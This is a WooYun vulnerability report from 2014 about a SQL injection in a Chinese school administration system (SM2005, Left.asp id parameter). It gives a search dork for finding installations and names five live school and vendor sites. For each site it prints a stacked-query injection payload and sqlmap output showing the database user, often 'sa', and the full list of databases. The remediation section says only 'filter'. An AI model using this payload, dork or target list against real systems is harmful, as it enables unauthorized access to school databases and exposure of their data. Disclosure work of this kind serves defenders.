当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083088

漏洞标题:某通用型校园校务系统SQL注入之二

相关厂商:南京苏亚星资讯科技开发有限公司

漏洞作者: Mr.leo

提交时间:2014-11-14 17:32

修复时间:2015-02-12 17:34

公开时间:2015-02-12 17:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-14: 细节已通知厂商并且等待厂商处理中
2014-11-19: 厂商已经确认,细节仅向厂商公开
2014-11-22: 细节向第三方安全合作伙伴开放
2015-01-13: 细节向核心白帽子及相关领域专家公开
2015-01-23: 细节向普通白帽子公开
2015-02-02: 细节向实习白帽子公开
2015-02-12: 细节向公众公开

简要描述:

boom!!!

详细说明:

厂商:南京苏亚星资讯科技开发有限公司
漏洞位于:/SM2005/jiaoshi/InfoSet/Left.asp?id=
id参数没有过滤,导致注射。
直接访问http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/ 有个越权报错,查看源代码可以拼接成注入链接

111.png


222.png


百度关键字:/SM2005
列举5个案例证明通用性:
http://www.sdwhys.com/SM2005/jiaoshi/InfoSet/Left.asp?id=0
Place: GET
Parameter: id
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=0'; WAITFOR DELAY '0:0:5';--
---
[09:14:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
[09:14:20] [INFO] fetching current user
[09:14:20] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[09:14:20] [INFO] resumed: ?aA
current user: '?aA'
[09:14:20] [INFO] fetching current database
[09:14:20] [INFO] resumed: yy200?a}
current database: 'yy200?a}'
[09:14:20] [INFO] fetching database names
[09:14:20] [INFO] fetching number of databases
[09:14:20] [INFO] resumed: 14
[09:14:20] [INFO] resumed: aaa
[09:14:20] [INFO] resumed: zupit\x7fr5
[09:14:20] [INFO] resumed: \x7faster
[09:14:20] [INFO] resumed: Merak
[09:14:20] [INFO] resumed: model
[09:14:20] [INFO] resumed: m?db
[09:14:20] [INFO] resumed: North?in?b
[09:14:20] [INFO] resumed: pubs
[09:14:20] [INFO] resumed: S?20g?
[09:14:20] [INFO] resumed: ?
http://www.zjnksyzx.com:8801/SM2005/jiaoshi/InfoSet/Left.asp?id=0
Place: GET
Parameter: id
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=0'; WAITFOR DELAY '0:0:5';--
---
[09:13:33] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server 2008
[09:13:33] [INFO] fetching current user
[09:13:34] [INFO] resumed: saA\x11
current user: 'saA'
[09:13:34] [INFO] fetching current database
[09:13:34] [INFO] resumed: qM2005
current database: 'qM2005'
[09:13:34] [INFO] fetching database names
[09:13:34] [INFO] fetching number of databases
[09:13:34] [INFO] resumed: 13
[09:13:34] [INFO] resumed: qupiter5\x11
[09:13:34] [INFO] resumed: maste}\x7f
[09:13:34] [INFO] resumed: Merak
[09:13:34] [INFO] resumed: model
[09:13:34] [INFO] resumed: msdb
[09:13:34] [INFO] resumed: Northwiyd
[09:13:34] [INFO] resumed: p}bs
[09:13:34] [INFO] resumed: SMa005
[09:13:34] [INFO] resumed: SRP2003
[09:13:34] [INFO] resumed: tempdb
[09:13:34] [INFO] resumed: TempJupiterSa
[09:13:34] [INFO] resumed: Vod2005
[09:13:34] [INFO] resumed: ws2004
available databases [13]:
[*] [maste}]
[*] [p}bs]
[*] [qupiter5]
[*] Merak
[*] model
[*] msdb
[*] Northwiyd
[*] SMa005
[*] SRP2003
[*] tempdb
[*] TempJupiterSa
[*] Vod2005
[*] ws2004
[09:13:34] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[09:13:34] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.zjnksyzx.com'
http://www.lcxyz.com:21245/SM2005/jiaoshi/InfoSet/Left.asp?id=0
Place: GET
Parameter: id
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=0'; WAITFOR DELAY '0:0:5';--
---
[18:06:43] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows Vista
web application technology: ASP.NET, ASP, Microsoft IIS 7.0
back-end DBMS: Microsoft SQL Server 2008
[18:06:43] [INFO] fetching current user
[18:06:43] [INFO] resumed: sa
current user: 'sa'
[18:06:43] [INFO] fetching current database
[18:06:43] [INFO] resumed: SM2005
current database: 'SM2005'
[18:06:43] [INFO] fetching database names
[18:06:43] [INFO] fetching number of databases
[18:06:43] [INFO] resumed: 13
[18:06:43] [INFO] resumed: Jupiter5
[18:06:43] [INFO] resumed: master
[18:06:43] [INFO] resumed: Merak\x03
[18:06:43] [INFO] resumed: mode}q
[18:06:43] [INFO] resumed: msdb
[18:06:43] [INFO] resumed: ReportServe\x7fq
[18:06:43] [INFO] resumed: ReportServerTempDB
[18:06:43] [INFO] resumed: SM2005
[18:06:43] [INFO] resumed: SRP2003
[18:06:43] [INFO] resumed: tempdb
[18:06:43] [INFO] resumed: vc?003
[18:06:43] [INFO] resumed: V}d2005
[18:06:43] [INFO] resumed: ws2004
available databases [13]:
[*] [Merak]
[*] [mode}q]
[*] [ReportServeq]
[*] [vc?003]
[*] [V}d2005]
[*] Jupiter5
[*] master
[*] msdb
[*] ReportServerTempDB
[*] SM2005
[*] SRP2003
[*] tempdb
[*] ws2004
[18:06:43] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[18:06:43] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.lcxyz.com'
http://www.suyaxing.com:81/SM2005/jiaoshi/InfoSet/Left.asp?id=0
Place: GET
Parameter: id
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=0'; WAITFOR DELAY '0:0:5';--
---
[09:16:55] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
[09:16:55] [INFO] fetching current user
[09:16:55] [INFO] resumed: sa
current user: 'sa'
[09:16:55] [INFO] fetching current database
[09:16:55] [INFO] resumed: SM2005
current database: 'SM2005'
[09:16:55] [INFO] fetching database names
[09:16:55] [INFO] fetching number of databases
[09:16:55] [INFO] resumed: 23
[09:16:55] [INFO] resumed: Jupiter5
[09:16:55] [INFO] resumed: master
[09:16:55] [INFO] resumed: yerak
[09:16:55] [INFO] resumed: model
[09:16:55] [INFO] resumed: msdb
[09:16:55] [INFO] resumed: Northwind
[09:16:55] [INFO] resumed: pubs
[09:16:55] [INFO] resumed: Sco_CRM
[09:16:55] [INFO] resumed: ScoyCSM
[09:16:55] [INFO] resumed: Sco_Document
[09:16:55] [INFO] resumed: Sco_Financial
[09:16:55] [INFO] resumed: Sco_Inve\x7ftory
[09:16:55] [INFO] resumed: Sco_Personnel
[09:16:55] [INFO] resumed: Sco_Platform
[09:16:55] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[09:16:55] [INFO] resumed: Sco_Por?al
[09:16:55] [INFO] resumed: SM2005
[09:16:55] [INFO] resumed: SRP2003
[09:16:55] [INFO] resumed: tempdb
[09:16:55] [INFO] resumed: TempJupiterSa
[09:16:55] [INFO] resumed: test
[09:16:55] [INFO] resumed: vc2003
[09:16:55] [INFO] resumed: web
[09:16:55] [INFO] resumed: ws2004
available databases [23]:
[*] [Sco_Invetory]
[*] [Sco_Por?al]
[*] Jupiter5
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] Sco_CRM
[*] Sco_Document
[*] Sco_Financial
[*] Sco_Personnel
[*] Sco_Platform
[*] ScoyCSM
[*] SM2005
[*] SRP2003
[*] tempdb
[*] TempJupiterSa
[*] test
[*] vc2003
[*] web
[*] ws2004
[*] yerak
[09:16:55] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.suyaxing.com'
http://www.hwsyxx.com/SM2005/jiaoshi/InfoSet/Left.asp?id=0
Place: GET
Parameter: id
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: id=0'; WAITFOR DELAY '0:0:5';--
---
[09:17:26] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003
web application technology: Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2008
[09:17:26] [INFO] fetching current user
[09:17:26] [INFO] resumed: sa
current user: 'sa'
[09:17:26] [INFO] fetching current database
[09:17:26] [INFO] resumed: SM2005
current database: 'SM2005'
[09:17:26] [INFO] fetching database names
[09:17:26] [INFO] fetching number of databases
[09:17:26] [INFO] resumed: 13
[09:17:26] [INFO] resumed: Ju\x7fiter5
[09:17:26] [INFO] resumed: master
[09:17:26] [INFO] resumed: Merak
[09:17:26] [INFO] resumed: model
[09:17:26] [INFO] resumed: msdb
[09:17:26] [INFO] resumed: Northwind
[09:17:26] [INFO] resumed: pubs
[09:17:26] [INFO] resumed: SM2005
[09:17:26] [INFO] resumed: SRP2a03
[09:17:26] [INFO] resumed: tempdb
[09:17:26] [INFO] resumed: vc2003
[09:17:26] [INFO] resumed: Vod2005
[09:17:26] [INFO] resumed: ws2004
available databases [13]:
[*] [Juiter5]
[*] master
[*] Merak
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] SM2005
[*] SRP2a03
[*] tempdb
[*] vc2003
[*] Vod2005
[*] ws2004
[09:17:26] [WARNING] cannot properly display Unicode characters inside Windows O
S command prompt (http://bugs.python.org/issue1602). All unhandled occurances wi
ll result in replacement with '?' character. Please, find proper character repre
sentation inside corresponding output files.
[09:17:26] [INFO] fetched data logged to text files under 'D:\PROGRA~1\???~1\???
~1.COM\TOOls\????\SQLMAP~1\Bin\output\www.hwsyxx.com'

漏洞证明:

已经证明

修复方案:

过滤

版权声明:转载请注明来源 Mr.leo@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2014-11-19 11:02

厂商回复:

最新状态:

暂无


漏洞评价:

评论